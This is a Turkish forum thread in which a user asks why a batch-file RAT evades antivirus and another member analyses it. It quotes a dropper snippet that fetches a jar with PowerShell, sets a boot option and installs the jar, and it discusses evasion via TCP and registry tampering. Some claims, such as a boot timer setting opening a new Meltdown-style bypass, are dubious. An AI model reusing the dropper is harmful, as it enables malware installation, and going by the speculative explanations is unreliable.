Çözüldü BAT dosyası olarak hazırlanan RAT'ı av neden tespit edemiyor?

Bu konu çözüldü olarak işaretlenmiştir. Çözülmediğini düşünüyorsanız konuyu rapor edebilirsiniz.
Çözüm
Dutchman
Önemli değil, kodun VT üzerinden birkaç incelemesini gerçekleştirdim;
  • Öncelikle koddaki riskli tek işlem useplatformtick, fakat tahminim gibi bu kernel bypass için kullanılmıyor, aksine dosya zamanlaması için sistemi hazırlıyor.
  • İçerikteki "Gold_Hit__EDIT_BY_MART_.jar" isimli dosyanın indirme bağlantısına eriştim, yine cdn.discordapp üzerinden sağlanıyor, üçüncü parti bir dosya. Verilen koddaki dosya ismi farklı olabilir fakat yapılan iş aynı.
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Segment Heap kayıt girdisine erişerek izole bellek alanı için değişiklik yapıyor, ki bu da SegmentationFault tetiklemesine sebep olarak bir nevi yapay "Meltdown" yaratıyor.
  • TCP kontrolü üzerinde yoğun bir değişiklik yaparak sistemden giden paket sınırını kaldırıyor ve hem aynı ağ hem de dış ağ üzerindeki iletişimi sürekli kılıyor - ki tipik RAT özelliği-.
Fakat bunları yapan, adı geçen .jar dosyası. Attığınız .bat dosyası batch obfuscation işlemine maruz kalmış, şifrelenmiş, bozulmuş bir yapıda. Bu sebeple antivirüslere yakalanmıyor, ayrıca doğrudan bu kodlar zararlı bir içerik oluşturmuyor. Bu sebeple AV yazılımları yakalayamıyordur.

Sezgisel tarama ve davranış taraması genellikle dış ağa kapalı sistemlerde gerçekleştiriliyor (güvenlik önlemi), bu sebeple indirmeye çalıştığı asıl zararlı dosyayı indiremediği için AV çözümleri zararlı algılamıyor.

Ayrıca konuştuğunuz kişi muhtemelen size doğru bilgiyi sunmuyor, zira VT üzerinden kodun kalan birkaç parçasına da eriştim, kod sadece attığınız bloktan ibaret değil. netsh üzerinden yoğun bir ön hazırlık gerçekleştirilmiş saldırı öncesi.

AV'lerin ağ destekli yanıtının gecikmesi için ise yerel trafik meşgul ediliyor, 65000 bytelık paketlerin localhost'a yönlendirilmesi ile.
Belki VirusTotal'deki çevrimdışı birkaç sandbox'ı atlatabilir ama deneyimli bir gözü asla 🙃
Tarihe göre sırala Puana göre sırala
İlginç, 12 mayısta görülmesine rağmen henüz bir AV tarafından tespit edilememiş. YARA kural eşleşmesi var kendini oradan ele veriyor. Net bir şey söylemek için kodu incelemem gerekli.
 
Artı 0 Eksi
Dutchman dedi:
İlginç, 12 mayısta görülmesine rağmen henüz bir AV tarafından tespit edilememiş. YARA kural eşleşmesi var kendini oradan ele veriyor. Net bir şey söylemek için kodu incelemem gerekli.
Genişletmek için tıkla...
Hocam kodu burada paylaşmam bir sorun teşkil eder mi?
 
Artı 0 Eksi
Adrastos dedi:
Hocam kodu burada paylaşmam bir sorun teşkil eder mi?
Genişletmek için tıkla...

Bu arada, noverify kullanarak doğrulamaları atlatıyor, TCP ayarlarına yoğun müdahalesi var, muhtemelen bundan dolayı tespit edilemiyor.
 
Son düzenleyen: Moderatör:
Artı 0 Eksi
Dutchman dedi:
Bu arada, noverify kullanarak doğrulamaları atlatıyor, TCP ayarlarına yoğun müdahalesi var, muhtemelen bundan dolayı tespit edilemiyor.
Genişletmek için tıkla...
Peki ya bunun sistemden arındırılma durumu nasıldır hocam?

Kod: 
@echo off
java -noverify -jar deneme.jar
bcdedit /set useplatformtick yes
powershell Invoke-WebRequest "deneme2.jar"" -OutFile

Tespit edilememesi bu satırlardan kaynaklanıyor sanırım.
 
Artı 0 Eksi
Adrastos dedi:
Peki ya bunun sistemden arındırılma durumu nasıldır hocam?
Genişletmek için tıkla...
Bulaşan zararlıya bağlı, "Gold_Hit__EDIT_BY_MART_.jar" isimli dosyanın ne olduğuyla ilgili bir fikrim yok, ayrıca -noverify kullanılması sadece dosya doğrulamasını atlatır. AV taramalarını bypass etmemeli.

Kodun bu kısmına göre, indirilen paket - ki burada "deneme2.jar" olarak tanımlı - bir Java sanal makinesinde çalıştırıldığı için izole alan oluşturup AV taramasından kaçabilir, fakat yürütme için mutlaka AV taraması gerekli.

Gözüme takılan nokta, useplatformtick kısmı oldu, Meltdown ve Spectre açıklarından işlemci zamanlayıcısı ile kernel arasındaki bariyeri kaldırıp AV yazılımlarını bypass edebilmek mümkündü, eğer attığınız dosya bu alanda bir işlem yapıyorsa karşımızda sıfırdan yeni bir Meltdown&Spectre zafiyeti mevcut demektir. Dosyaya nereden eriştiniz? Bat dosyasını siz mi yazdınız yoksa internetten mi buldunuz?

Tam sonuç için dediğim gibi kodları incelemem gerekli, attığınız kodlarda tek sorun yaratabilecek kısım useplatformtick, AV yazılımlarının çalışmasına da etki edebilir, CPU bariyerini aşarak kernel iletişimini de kırabilir.
 
Artı 0 Eksi
Dutchman dedi:
Bulaşan zararlıya bağlı, "Gold_Hit__EDIT_BY_MART_.jar" isimli dosyanın ne olduğuyla ilgili bir fikrim yok, ayrıca -noverify kullanılması sadece dosya doğrulamasını atlatır. AV taramalarını bypass etmemeli.

Kodun bu kısmına göre, indirilen paket - ki burada "deneme2.jar" olarak tanımlı - bir Java sanal makinesinde çalıştırıldığı için izole alan oluşturup AV taramasından kaçabilir, fakat yürütme için mutlaka AV taraması gerekli.

Gözüme takılan nokta, useplatformtick kısmı oldu, Meltdown ve Spectre açıklarından işlemci zamanlayıcısı ile kernel arasındaki bariyeri kaldırıp AV yazılımlarını bypass edebilmek mümkündü, eğer attığınız dosya bu alanda bir işlem yapıyorsa karşımızda sıfırdan yeni bir Meltdown&Spectre zafiyeti mevcut demektir. Dosyaya nereden eriştiniz? Bat dosyasını siz mi yazdınız yoksa internetten mi buldunuz?

Tam sonuç için dediğim gibi kodları incelemem gerekli, attığınız kodlarda tek sorun yaratabilecek kısım useplatformtick, AV yazılımlarının çalışmasına da etki edebilir, CPU bariyerini aşarak kernel iletişimini de kırabilir.
Genişletmek için tıkla...
Zararlıların nasıl antivirüsü atladığıyla ilgili çeşitli forum sitelerinde ve Discord üzerinde araştırma yapıyordum. Bir Discord sunucusunda bu BAT ile yazılan RAT'ın nasıl tespit edilemez hale geleceğine dair tutorial tarzı bir şey sunmuşlar. Duyuru olarak paylaştıktan hemen sonra paylaştıkları kod bloğunu sildiler. Tam hali aşağıdaki gibi:

İsterseniz BAT dosyasının içerisindeki kodları yarın sizinle paylaşabilirim @Dutchman hocam, bu dosyanın not defteri ile açılması sistem açısından bir sorun yaratmaz değil mi? Dosyayı şu an indirmedim sistemime. Sadece paylaştıkları ve anında sildikleri bir dizi kodu alabildim.
Kod: 
@echo off
java -noverify -jar babaproxd.jar
bcdedit /set useplatformtick yes
powershell Invoke-WebRequest "qwewqe.jar"" -OutFile "%temp%\Gold_Hit__EDIT_BY_MART_.jar"
move "%temp%\babaproxd.jar" "C:\"
"C:\babaproxd.jar" -install
 
Artı 0 Eksi

Benzer konular

Elliot Türkinson
  • Kilitli
Defender BAT dosyasını virüs olarak algıladı
Mesaj
3
Görüntüleme
397
Elliot Türkinson
Elliot Türkinson
SiyahPassat
Kaspersky, CPU kullanan virüsü tespit edemiyor
2 3
Mesaj
21
Görüntüleme
2B
Murat5038
Murat5038
just_abs
Bat dosyası tehlikeli mi?
Mesaj
4
Görüntüleme
92
cagriyeni
cagriyeni
Rotz.exe
Bat dosyası güvenli mi?
Mesaj
0
Görüntüleme
343
Rotz.exe
Rotz.exe
JacKss
  • Soru
BAT dosyası zararlı olabilir mi?
Mesaj
9
Görüntüleme
617
JacKss
JacKss

Yeni konular

Yeni mesajlar

Geri
Yukarı